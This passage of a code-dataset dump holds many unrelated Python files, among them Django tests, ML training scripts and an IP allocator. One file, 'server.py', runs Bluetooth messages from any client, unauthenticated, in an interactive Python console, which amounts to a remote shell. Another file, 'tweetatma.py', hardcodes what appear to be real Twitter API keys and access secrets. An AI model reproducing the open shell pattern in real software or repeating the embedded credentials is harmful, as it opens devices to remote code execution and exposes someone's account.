[]\n _dfs(nums, [], output)\n return output\n","sub_path":"leetcode/lc47_Permutations_II.py","file_name":"lc47_Permutations_II.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327026021","text":"import pika\nfrom crawler import *\nfrom config import *\n\nconnection = pika.BlockingConnection(parameters=RabbitConfig.get_rabbit_params())\nchannel = connection.channel()\nchannel.basic_qos(prefetch_count=1)\nchannel.queue_declare(queue = RabbitConfig.UAEJJF_PROFILE_INFO, durable = True)\n\ndef save_to_db(ch, method, properties, body):\n body = json.loads(body)\n profile_id = body.get(\"profile_id\")\n profile = uaejjf_parse_profile(profile_id)\n uaejjf_save_profile(profile)\n ch.basic_ack(delivery_tag = method.delivery_tag)\n\ndef run():\n channel.basic_consume(on_message_callback = save_to_db, queue = RabbitConfig.UAEJJF_PROFILE_INFO)\n channel.start_consuming()\n\nrun()","sub_path":"uaejjf_profile_info.py","file_name":"uaejjf_profile_info.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86293778","text":"from django.test import TestCase\nfrom django.test import tag\nfrom django.utils import timezone\n\nfrom model_mommy import mommy\n\nfrom instructions.models import (\n Instruction, InstructionAdditionQuestion, InstructionConditionsOfInterest,\n InstructionPatient\n)\nimport datetime\nfrom accounts.models import User, ClientUser, Patient, GeneralPracticeUser\nfrom snomedct.models import SnomedConcept\nfrom instructions.model_choices import *\nfrom instructions.cron.notification_mail import instruction_notification_email_job\nfrom django.core import mail\nfrom django.contrib.contenttypes.models import ContentType\nfrom snomedct.models import SnomedConcept\n\n\nclass InstructionReminderTest(TestCase):\n def setUp(self):\n self.now = timezone.now()\n content_type = ContentType.objects.get(model='organisationgeneralpractice')\n self.instruction = mommy.make(\n Instruction, gp_practice_type=content_type,\n )\n\n def test_reminder_3_days(self):\n self.instruction.created=self.now-datetime.timedelta(days=3)\n self.instruction.save()\n instruction_notification_email_job()\n self.assertEqual(3, self.instruction.reminders.filter(reminder_day=3).first().reminder_day)\n\n def test_reminder_7_days(self):\n self.instruction.created=self.now-datetime.timedelta(days=7)\n self.instruction.save()\n instruction_notification_email_job()\n self.assertEqual(7, self.instruction.reminders.filter(reminder_day=7).first().reminder_day)\n\n def test_reminder_14_days(self):\n self.instruction.created=self.now-datetime.timedelta(days=14)\n self.instruction.save()\n instruction_notification_email_job()\n self.assertEqual(14, self.instruction.reminders.filter(reminder_day=14).first().reminder_day)\n\n\nclass InstructionPatientTest(TestCase):\n def setUp(self):\n self.patient_telephone_code='111'\n self.patient_alternate_code='112'\n self.instruction_patient = mommy.make(InstructionPatient,\n patient_first_name='aaa',\n patient_last_name='bbb'\n )\n\n def test_get_phone_without_zero(self):\n self.assertEqual(InstructionPatient.get_phone_without_zero(self, '12345'), '12345')\n self.assertEqual(InstructionPatient.get_phone_without_zero(self, '012345'), '12345')\n\n def test_get_telephone_e164(self):\n telephone = InstructionPatient.get_phone_without_zero(self, '012345')\n self.assertEqual('+11112345', \"+%s%s\"%(self.patient_telephone_code, telephone))\n\n def test_get_alternate_e164(self):\n alternate = InstructionPatient.get_phone_without_zero(self, '054321')\n self.assertEqual('+11254321', \"+%s%s\"%(self.patient_alternate_code, alternate))\n\n\nclass InstructionTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.to_email = 'sample@domain.com'\n cls.user_1 = mommy.make(User, username='test_user_1', first_name='client')\n cls.user_2 = mommy.make(User, username='test_user_2', first_name='patient')\n cls.user_3 = mommy.make(User, username='gpuser', first_name='gpuser')\n cls.client_user = mommy.make(ClientUser, user=cls.user_1)\n cls.patient = mommy.make(Patient, user=cls.user_2)\n cls.instruction = mommy.make(\n Instruction, client_user=cls.client_user, patient=cls.patient, type=SARS_TYPE\n )\n cls.sars = SARS_TYPE\n cls.amra = AMRA_TYPE\n\n def test_string_representation(self):\n instruction_string = str(self.instruction)\n instruction_id = self.instruction.id\n self.assertEqual(instruction_string, 'Instruction #{id}'.format(id=instruction_id))\n\n def test_in_progress(self):\n self.instruction.status = INSTRUCTION_STATUS_PROGRESS\n self.assertEqual(1, self.instruction.status)\n\n def test_reject(self):\n gpuser = mommy.make(\n GeneralPracticeUser,\n user=self.user_3,\n role=0\n )\n self.instruction.rejected_reason = \"rejected reason\"\n self.instruction.rejected_note = \"rejected note\"\n self.instruction.rejected_by = self.user_3\n self.instruction.rejected_timestamp = timezone.now()\n self.instruction.status = INSTRUCTION_STATUS_REJECT\n self.assertEqual(4, self.instruction.status)\n\n def test_send_no_reject_email_to_patient_or_client(self):\n self.assertEqual(len(mail.outbox), 0)\n\n def test_get_type(self):\n self.assertEqual('SARS', self.instruction.type)\n\n def test_is_sars(self):\n self.assertEqual('SARS', self.sars)\n\n def test_is_amra(self):\n self.assertEqual('AMRA', self.amra)\n\n\nclass InstructionAdditionQuestionTest(TestCase):\n def test_string_representation(self):\n instruction_addition_question = mommy.make(\n InstructionAdditionQuestion, question='test_question?'\n )\n self.assertEqual(str(instruction_addition_question), 'test_question?')\n\n\nclass InstructionConditionsOfInterestTest(TestCase):\n def test_string_representation(self):\n snomedct = mommy.make(\n SnomedConcept, fsn_description='fsn_description',\n external_id=1234567890\n )\n instruction_conditions_of_interest = mommy.make(\n InstructionConditionsOfInterest, snomedct=snomedct\n )\n self.assertEqual(\n str(instruction_conditions_of_interest),\n 'fsn_description (1234567890)'\n )\n","sub_path":"instructions/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179293997","text":"\"\"\"\nA simple Python script to receive messages from a client over\nBluetooth using PyBluez (with Python 3.7).\n\"\"\"\n\nimport readline\nimport code\nimport bluetooth, time\nimport ports\nhostMACAddress = '' #leave empty\nport = 3\nbacklog = 1\nsize = 1024\ns = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\ns.bind((hostMACAddress, port))\ns.listen(backlog)\nvars = globals().copy()\nvars.update(locals())\nshell = code.InteractiveConsole(vars)\nprint(\"up and running\")\ntry:\n client, clientInfo = s.accept()\n while 1:\n data = client.recv(size)\n if data:\n #time.sleep(0.1)\n msg = data.decode()\n print(msg)\n shell.push(msg)\n #time.sleep(0.1)\n client.send(\"Yes\") # Echo back to client\nexcept: \n print(\"Closing socket\")\n client.close()\n s.close()","sub_path":"Ball Thrower/NewFirmware/SpeechToTxt/airtable/blue/bluetest2/bluetest/bluett/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362679313","text":"\"\"\"guizi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport core.management.urls as API_URL\nimport core.views as front\nfrom guizi import settings\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^management/', include(API_URL)),\n url(r'^user/', include('userena.urls')),\n url(r'^comments/', include('django_comments.urls')),\n url(r'^$', front.home, name=\"title\"),\n url(r'^uploads/', front.uploads),\n url(r'^shop/$', front.shop),\n url(r'^shop/list/$', front.shop_list),\n # url(r'^shop/type/(?P[^/]+)/$', front.type),\n # url(r'^shop/brand/(?P[^/]+)/$', front.brand),\n url(r'^shop/(?P\\d+)$', front.product_info),\n url(r'^portfolio/$', front.portfolio),\n url(r'^portfolio/(?P[^/]+)/$', front.portfolio_info),\n url(r'^article/$', front.blog),\n url(r'^article/(?P[^/]+)/$', front.article_info),\n url(r'^activity/(?P[^/]+)/$', front.activity_infor),\n url(r'like/', front.like),\n url(r'about-us/', front.aboutus, name=\"find-us\"),\n url(r'find-us/', front.contact),\n url(r'^search/', include('haystack.urls')),\n]\n\n# Add media and static files\nurlpatterns += staticfiles_urlpatterns()\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"guizi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237118719","text":"\"\"\"\nImplementing faster_rcnn_resnet50_coco from\nTensorFlow1 Detection Model Zoo\n(https://github.com/tensorflow/models/blob/master/research/\nobject_detection/g3doc/tf1_detection_zoo.md)\n\"\"\"\n\nfrom art.estimators.object_detection.tensorflow_faster_rcnn import TensorFlowFasterRCNN\nimport tensorflow as tf\n\n\nclass TensorFlowFasterRCNNOneIndexed(TensorFlowFasterRCNN):\n \"\"\"\n This is an MSCOCO pre-trained model. Note that the inherited TensorFlowFasterRCMM class\n outputs 0-indexed classes, while this wrapper class outputs 1-indexed classes. A label map can be found at\n https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_label_map.pbtxt\n\n This model only performs inference and is not trainable. To train\n or fine-tune this model, please follow instructions at\n https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/tf1.md\n \"\"\"\n\n def __init__(self, images):\n super().__init__(\n images,\n model=None,\n filename=\"faster_rcnn_resnet50_coco_2018_01_28\",\n url=\"http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet50_coco_2018_01_28.tar.gz\",\n sess=None,\n is_training=False,\n clip_values=(0, 1),\n channels_first=False,\n preprocessing_defences=None,\n postprocessing_defences=None,\n attack_losses=(\n \"Loss/RPNLoss/localization_loss\",\n \"Loss/RPNLoss/objectness_loss\",\n \"Loss/BoxClassifierLoss/localization_loss\",\n \"Loss/BoxClassifierLoss/classification_loss\",\n ),\n )\n\n def compute_loss(self, x, y):\n raise NotImplementedError\n\n def loss_gradient(self, x, y, **kwargs):\n y_zero_indexed = []\n for y_dict in y:\n y_dict_zero_indexed = y_dict.copy()\n y_dict_zero_indexed[\"labels\"] = y_dict_zero_indexed[\"labels\"] - 1\n y_zero_indexed.append(y_dict_zero_indexed)\n return super().loss_gradient(x, y_zero_indexed, **kwargs)\n\n def predict(self, x, **kwargs):\n list_of_zero_indexed_pred_dicts = super().predict(x, **kwargs)\n list_of_one_indexed_pred_dicts = []\n for img_pred_dict in list_of_zero_indexed_pred_dicts:\n zero_indexed_pred_labels = img_pred_dict[\"labels\"]\n img_pred_dict[\"labels\"] = zero_indexed_pred_labels + 1\n list_of_one_indexed_pred_dicts.append(img_pred_dict)\n return list_of_one_indexed_pred_dicts\n\n\ndef get_art_model(model_kwargs, wrapper_kwargs, weights_file=None):\n # APRICOT inputs should have shape (1, None, None, 3) while DAPRICOT inputs have shape\n # (3, None, None, 3)\n images = tf.placeholder(\n tf.float32, shape=(model_kwargs.get(\"batch_size\", 1), None, None, 3)\n )\n model = TensorFlowFasterRCNNOneIndexed(images)\n return model\n","sub_path":"armory/baseline_models/tf_graph/mscoco_frcnn.py","file_name":"mscoco_frcnn.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505470408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 13:50:42 2020\n\n@author: hp\n\"\"\"\nimport math\nimport tensorflow as tf\nfrom keras.preprocessing.image import ImageDataGenerator\ntf.__version__\n\ncompute_step_epoch=lambda x:int(math.ceil(1.* x/32))#calculation of epoches step\n\n\ncnn = tf.keras.models.Sequential()\n\n# Step 1 - Convolution\ncnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, padding=\"same\", activation=\"relu\", input_shape=(64, 64, 3)))\n\n# Step 2 - Pooling\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2, padding='valid'))\n\n# Adding a second convolutional layer(to increase a success)\ncnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, padding=\"same\", activation=\"relu\"))\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2, padding='valid'))\n\n# Step 3 - Flattening\ncnn.add(tf.keras.layers.Flatten())\n\n# Step 4 - Full Connection\ncnn.add(tf.keras.layers.Dense(units=128, activation='relu'))\n\n# Step 5 - Output Layer\ncnn.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))\n\n\n\n# Part 3 - Training the CNN\n\n# Compiling the CNN\ncnn.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])#loss='categorical_crossentropy'\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\n# Generating images for the Test set\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\n# Creating the Training set\ntraining_set = train_datagen.flow_from_directory('data_set/train',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'categorical')\n\n# Creating the Test set\ntest_set = test_datagen.flow_from_directory('data_set/test',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'categorical')\n\nsteps_of_epochs_training=compute_step_epoch(1452)\nsteps_of_epoch_test=compute_step_epoch(363)\n# Training the CNN on the Training set and evaluating it on the Test set\ncnn.fit_generator(training_set,\n steps_per_epoch = steps_of_epochs_training,#no. of images in our training set\n epochs = 25,\n validation_data =test_set,\n validation_steps = steps_of_epoch_test)\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627749737","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 16:02:03 2018\n\n@author: watec\n\"\"\"\n\nimport tensorflow as tf\n\n#create a graph\ng = tf.Graph()\n\n#Establish the graph as the \"default\" grap\nwith g.as_default():\n #Assemble a graph consisting of the following three operations\n # *Two tf.constant operations to create the operands.\n # *One tf.add operation to add the two operands.\n x = tf.constant(8, name=\"x_const\")\n y = tf.constant(5, name=\"y_const\")\n sum = tf.add(x, y, name=\"x_y_sum\")\n z = tf.constant(4, name=\"z_const\")\n new_sum = tf.add(sum, z, name=\"x_y_z_sum\")\n \n #Now create a session.\n #The session will run the default graph.\n with tf.Session() as sess:\n print(new_sum.eval())","sub_path":"tensorflow_programming_concepts.py","file_name":"tensorflow_programming_concepts.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178529412","text":"import numpy as np\r\nimport re\r\ndef readToMatrix(filename,name):\r\n f=open(filename,\"rt\")\r\n#\r\n if name in ['pssm','psfm','pssmAndLabels','psfmAndLabels']:\r\n pssm=[]\r\n for j,line in enumerate(f.readlines()):\r\n if j > 2:\r\n line=line.strip()\r\n overall_vec = re.split(r\" +\",line)\r\n if len(overall_vec)<44:\r\n break\r\n else:\r\n pssm.append(overall_vec[:42])\r\n pssm=np.array(pssm)\r\n if name == 'pssm':\r\n return pssm[:, 2:22].astype(np.float) #\r\n elif name == 'psfm':\r\n return pssm[:, 22:42].astype(np.float) #\r\n elif name == 'pssmAndLabels':\r\n return pssm[:, 2:22].astype(np.float), pssm[:, 1] #\r\n elif name == 'psfmAndLabels':\r\n return pssm[:, 22:42].astype(np.float), pssm[:, 1] #\r\n\r\n#\r\ndef autoNorm(matrix,name):\r\n if name==\"pssm\":\r\n matrix=matrix.astype(np.float)\r\n matrix = 1 / (1 + np.exp(0 - matrix))\r\n elif name==\"psfm\":\r\n matrix=matrix.astype(np.float)\r\n matrix = matrix / 100\r\n return matrix\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"iT4SE-EP (320D)/readToMatrix.py","file_name":"readToMatrix.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86339296","text":"# from downloader import DownloaderThread\nfrom ctypes import alignment\nfrom queue import Queue\nimport time\n# import yaml\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n# import utils\nimport math\nimport tomli\nfrom config import Config\nfrom media import Media\nfrom downloader import DownloaderThread\nimport utils\n\nfrom random import randrange\n\nfrom PyQt5.QtCore import Qt, pyqtProperty, QTimer, QAbstractAnimation, QTimeLine, QSize, QPointF, QPoint\nfrom PyQt5.QtWidgets import QLabel, QWidget\nfrom PyQt5.QtGui import QPainter, QStaticText, QTransform, QImage, qRgba, QColor, qRed, QRgba64, qRgb, QGradient, \\\n QLinearGradient, QBrush\n\n\n# based on https://stackoverflow.com/a/10655396/160630 - thanks!\n\nclass marqueeLabel(QLabel):\n\n def __init__(self, parent):\n super(marqueeLabel, self).__init__(parent)\n self.staticText = QStaticText()\n self.staticText.setTextFormat(Qt.PlainText)\n self._string = ''\n self.timer = QTimer()\n self.timer.setInterval(10)\n self.timer.setTimerType(Qt.PreciseTimer)\n self.timer.timeout.connect(self.timerTimeout)\n self.waitTimer = QTimer()\n self.waitTimer.setInterval(2000)\n self.waitTimer.timeout.connect(self.timerTimeout)\n self.leftMargin = self.height() / 3\n self.scrollPos = 0\n self.buffer = QImage()\n self.alphaChannel = QImage()\n self.scrollEnabled = False\n self.waiting = True\n self.seperator = ' -- '\n self.updateText()\n\n def text(self):\n return self._string\n\n def setText(self, string):\n self._string = string\n self.updateText()\n self.update()\n self.updateGeometry()\n\n def sizeHint(self):\n return QSize(min(self.wholeTextSize.width() + self.leftMargin, self.maximumWidth()),\n self.fontMetrics().height())\n\n def updateText(self):\n self.timer.stop()\n\n self.singleTextWidth = self.fontMetrics().width(self._string)\n self.scrollEnabled = self.singleTextWidth > self.width() - self.leftMargin\n\n if self.scrollEnabled:\n\n self.staticText.setText(self._string + self.seperator)\n if not self.window().windowState() & Qt.WindowMinimized:\n self.scrollPos = 0\n self.waitTimer.start()\n self.waiting = True\n else:\n self.staticText.setText(self._string)\n\n self.staticText.prepare(QTransform(), self.font())\n self.wholeTextSize = QSize(self.fontMetrics().width(self.staticText.text()),\n self.fontMetrics().height())\n\n # self.setFixedWidth()\n\n def hideEvent(self, event):\n if self.scrollEnabled:\n self.scrollPos = 0\n self.timer.stop()\n self.waitTimer.stop()\n\n def showEvent(self, event):\n if self.scrollEnabled:\n self.waitTimer.start()\n self.waiting = True\n\n def paintEvent(self, paintevent):\n painter = QPainter(self)\n\n if self.scrollEnabled:\n self.buffer.fill(qRgba(0, 0, 0, 0))\n pb = QPainter(self.buffer)\n pb.setPen(painter.pen())\n pb.setFont(painter.font())\n\n x = min(-self.scrollPos, 0) + self.leftMargin\n while x < self.width():\n pb.drawStaticText(QPointF(x, (self.height() - self.wholeTextSize.height()) / 2), self.staticText)\n x += self.wholeTextSize.width()\n # apply Alpha channel\n pb.setCompositionMode(QPainter.CompositionMode_DestinationIn)\n pb.setClipRect(self.width() - 15, 0, 15, self.height())\n pb.drawImage(0, 0, self.alphaChannel)\n pb.setClipRect(0, 0, 15, self.height())\n pb.drawImage(0, 0, self.alphaChannel)\n painter.drawImage(0, 0, self.buffer)\n else:\n painter.drawStaticText(QPointF(self.leftMargin,\n (self.height() - self.wholeTextSize.height()) / 2),\n self.staticText)\n\n def resizeEvent(self, resizeEvent):\n # When the widget is resized, we need to update the alpha channel.\n self.alphaChannel = QImage(self.size(), QImage.Format_ARGB32_Premultiplied)\n self.buffer = QImage(self.size(), QImage.Format_ARGB32_Premultiplied)\n self.alphaChannel.fill(qRgba(0, 0, 0, 0))\n self.buffer.fill(qRgba(0, 0, 0, 0))\n if self.width() > 64:\n grad = QLinearGradient(QPointF(0, 0), QPointF(16, 0))\n grad.setColorAt(0, QColor(0, 0, 0, 0))\n grad.setColorAt(1, QColor(0, 0, 0, 255))\n painter = QPainter(self.alphaChannel)\n painter.setBrush(grad)\n painter.setPen(Qt.NoPen)\n painter.drawRect(0, 0, 16, self.height())\n grad = QLinearGradient(QPointF(self.alphaChannel.width() - 16, 0),\n QPointF(self.alphaChannel.width(), 0))\n grad.setColorAt(0, QColor(0, 0, 0, 255))\n grad.setColorAt(1, QColor(0, 0, 0, 0))\n painter.setBrush(grad)\n painter.drawRect(self.alphaChannel.width() - 16, 0, self.alphaChannel.width(), self.height())\n # filename = 'alphaChannel'+str(randrange(0, 100000))+'.png'\n # print('writing '+filename)\n # self.alphaChannel.save(filename, 'PNG')\n else:\n self.alphaChannel.fill(QColor(0, 0, 0))\n\n newScrollEnabled = (self.singleTextWidth > self.width() - self.leftMargin)\n if not newScrollEnabled == self.scrollEnabled:\n self.updateText()\n\n def timerTimeout(self):\n self.scrollPos = (self.scrollPos + 5) % \\\n self.wholeTextSize.width()\n if self.waiting == True:\n self.waiting = False\n self.timer.start()\n self.waitTimer.stop()\n if self.scrollPos == 0:\n self.waiting = True\n self.timer.stop()\n self.waitTimer.start()\n\n self.update()\n\n\nclass Blink(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n \n self.config = Config(\"config.toml\")\n self.title = 'Blink'\n\n # #Start downloader\n self.media_current: Media = None\n self.media_queue = Queue(maxsize=self.config.max_queue_size)\n self.downloader_thread = DownloaderThread(self.config, self.media_queue)\n self.downloader_thread.start()\n\n #Start viewer\n\n self._viewer_timer = QtCore.QTimer()\n self._viewer_timer.setSingleShot(True)\n self._viewer_timer.timeout.connect(self.show_media)\n\n # Clean folders and create buffers\n utils.delete_everything_in_folder(self.config.media_dir)\n utils.create_folder(self.config.media_dir)\n\n self.initUI()\n\n\n\n def initUI(self):\n self.setWindowTitle(self.title)\n\n screenShape = QtWidgets.QDesktopWidget().screenGeometry()\n #self.setFixedSize(screenShape.width(),screenShape.height())\n\n widget = QWidget()\n \n\n self.label_movie = QtWidgets.QLabel(widget)\n self.label_movie.setStyleSheet(\"background-color: black\")\n self.label_movie.setFixedSize(screenShape.width(),screenShape.height())\n \n self.label_movie.setAlignment(Qt.AlignmentFlag.AlignHCenter)\n\n\n self.label_marquee = marqueeLabel(widget)\n self.label_marquee.setStyleSheet(\"background-color: rgba(255, 255, 255, 150);\")\n self.label_marquee.setText(\"suck my big fat juicy cock suck my big fat juicy cock suck my big fat juicy cock\")\n self.label_marquee.setFont(QtGui.QFont(\"Sans Serif\",50))\n self.label_marquee.setFixedWidth(screenShape.width())\n # drop_shadow = QtWidgets.QGraphicsDropShadowEffect()\n # drop_shadow.setBlurRadius(20)\n # drop_shadow.setColor(QtGui.QColor(\"#000000\"))\n # drop_shadow.setOffset(5,5)\n # l.setGraphicsEffect(drop_shadow)\n\n layout_box = QtWidgets.QHBoxLayout(widget)\n layout_box.setContentsMargins(0, 0, 0, 0)\n layout_box.addWidget(self.label_marquee, alignment=Qt.AlignmentFlag.AlignBottom)\n \n \n widget.setLayout(layout_box)\n self.setCentralWidget(widget)\n\n self.showFullScreen()\n\n\n def show_media(self):\n print(\"Timer tick\")\n \n\n if self.media_current is not None:\n utils.remove_file(self.media_current.filepath)\n\n #Fetch new image from queue\n self.media_current = self.media_queue.get()\n\n #self.media_current = Media(\"toolschan.jpg\",\"sir please help me, me and my family are in dire need of memes. quickly, with haste, help feed my starving children\")\n if self.media_current is None:\n pass\n \n if self.media_current.isValid():\n movie = QtGui.QMovie(self.media_current.filepath)\n \n if movie.isValid():\n self.label_movie.setMovie(movie)\n self.label_marquee.setText(self.media_current.title)\n movie.start()\n \n timer = QtCore.QTimer.singleShot(10000, self.show_media)\n\n\n def showBlink(self):\n self.showFullScreen()\n\n def hideBlink(self):\n self.hide()\n\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = Blink()\n ex.show_media()\n sys.exit(app.exec_())\n","sub_path":"blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":9502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128475169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 1 21:51:11 2019\n\n@author: fengmingshan\n\"\"\"\n\n\nfrom IPy import IP\nimport pandas as pd\n\ndef get_ip_list(begin_ip, count, netmask):\n ip_list = '' #用来存放生成的IP地址\n begin_ip = IP(begin_ip)\n ip_list += str(begin_ip) + '\\n' #将第一个地址放入ip_列表中\n if begin_ip.version() == 4:\n for i in range(count):\n ip = IP(begin_ip)\n new_ip = IP(ip.ip + 2 ** (32 - netmask))\n begin_ip = str(new_ip)\n ip_list += begin_ip + '\\n'\n else:\n for i in range(count):\n ipv6 = IP(begin_ip)\n new_ipv6 = IP(ipv6.ip + 2 ** (128 - netmask))\n begin_ip = str(new_ipv6)\n ip_list += begin_ip + '\\n'\n return ip_list\n\nif __name__ == \"__main__\":\n num = 20\n mask = 28\n start_ip = '53.3.16.144'\n ipv4_list = get_ip_list(begin_ip = start_ip, count=num-1, netmask=mask)\n print('批量分配业务IPv4地址:')\n print('============================')\n print(ipv4_list)\n\n ip_list = ipv4_list.strip().split('\\n')\n gateway = ['.'.join(x.split('.')[:-1])+'.'+str(int(x.split('.')[-1])+1) for x in ip_list]\n ip_num = [IP(x+'/{}'.format(mask)).len()-3 for x in ip_list]\n ip_add_begin = [str(IP(x+'/{}'.format(mask))[2]) for x in ip_list]\n ip_add_end = [str(IP(x+'/{}'.format(mask))[-2]) for x in ip_list]\n\n df_ip = pd.DataFrame({\n 'no':range(len(ip_list)),\n 'IP地址段':ip_list,\n '网关':gateway,\n '掩码':mask,\n '数量':ip_num,\n '起始地址':ip_add_begin,\n '终止地址':ip_add_end,\n '区县':'',\n '厂家':'',\n '备注':'',\n })\n with open(r'C:\\Users\\Administrator\\Desktop\\IPv4_address.csv','w',newline = '') as f:\n df_ip.to_csv(f,index = False)\n# ipv6_list2 = get_ip_list(begin_ip = 'FD00:0:2e3f::', count=10, netmask=127)\n# print('批量分配互联IPv6地址:')\n# print('============================')\n# print(ipv6_list2)\n#\n# ip_list = get_ip_list(begin_ip='192.168.1.0', count=10,netmask=24)\n# print('批量分配业务IPv4地址:')\n# print('============================')\n# print(ip_list)\n#\n# ip_list2 = get_ip_list(begin_ip='192.168.2.0', count = 10, netmask=30)\n# print('批量分配互联IPv4地:')\n# print('============================')\n# print(ip_list2)","sub_path":"处理IP地址/批量分配IP地址_IPv4.py","file_name":"批量分配IP地址_IPv4.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120105095","text":"#!/usr/bin/env python\n \nimport sys\nimport tweepy\n \nCONSUMER_KEY = 'etyKJW6igiXRy8Aw2n4C2bSzP'\nCONSUMER_SECRET = 'WdqSlquoEoHpXysRdMr35ZFAKMF8jMIZTosv4bZkJjRkG1KU5Z'\nACCESS_KEY = '1573473253-APBbG3lAybQdEuJekavwWbmMSRp312sjYl6n9rt'\nACCESS_SECRET = 'gfqpK1QiYR31gw0U8YUtIYJvnsPUXkfYxRBcvyakwLgcN'\n \ntwitter = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\ntwitter.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(twitter)\napi.update_status('merhaba pi :)')","sub_path":"tweetatma.py","file_name":"tweetatma.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502506324","text":"#! /usr/bin/env pypy\n\ndef factorial(n):\n o = 1\n while n > 1:\n o = o * n\n n -= 1\n return o\n\nn = factorial(100)\nprint(n)\nprint(sum(map(int, str(n))))\n","sub_path":"euler_20.py","file_name":"euler_20.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178948611","text":"\"\"\"Run EPI on oscillating 2D LDS. \"\"\"\n\nfrom epi.models import Model, Parameter\nfrom epi.example_eps import linear2D_freq\nfrom epi.util import sample_aug_lag_hps\nimport numpy as np\nimport tensorflow as tf\nimport argparse\n\nDTYPE = np.float32\n\n# Get random seed.\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', type=int)\nparser.add_argument('--d', type=int)\nargs = parser.parse_args()\n\nprint('Running epi for matrix determinant with hyper parameter random seed %d.' % args.seed)\nd = args.d\n\n\n# 1. Define model: dxd matrix\nD = d**2\n\n# Set up the bound vectors.\nlb_val = -2.\nub_val = 2.\nlb_diag = 1.\ndef off_diag(d, val):\n x = val*np.ones((d,d), dtype=DTYPE)\n for i in range(d):\n x[i,i] = 0.\n return x\nlb = np.reshape(lb_diag*np.eye(d) + off_diag(d, lb_val), (D,))\nub = ub_val*np.ones((D,))\n\n# Define the parameter A.\nA = Parameter(\"A\", D, lb=lb, ub=ub)\nparameters = [A]\n\n# Define the model matrix.\nM = Model(\"matrix\", parameters)\n\n# 2. Define the emergent property: E[det(A)] = 100, std(det(A)) = 5\nmu = np.array([100., 5.], dtype=np.float32)\n\n@tf.function\ndef _det(A):\n N = A.get_shape()[0]\n A = tf.reshape(A, (N, d, d))\n detA = tf.linalg.det(A)\n T_x = tf.stack([detA, tf.square(detA-mu[0])], axis=1)\n return T_x\n\ndef det(A):\n return _det(A)\n\nM.set_eps(det)\n\n\nnp.random.seed(args.seed)\nnum_stages = np.random.randint(2, 6) \nnum_layers = 2 #np.random.randint(1, 3)\nnum_units = np.random.randint(15, max(30, 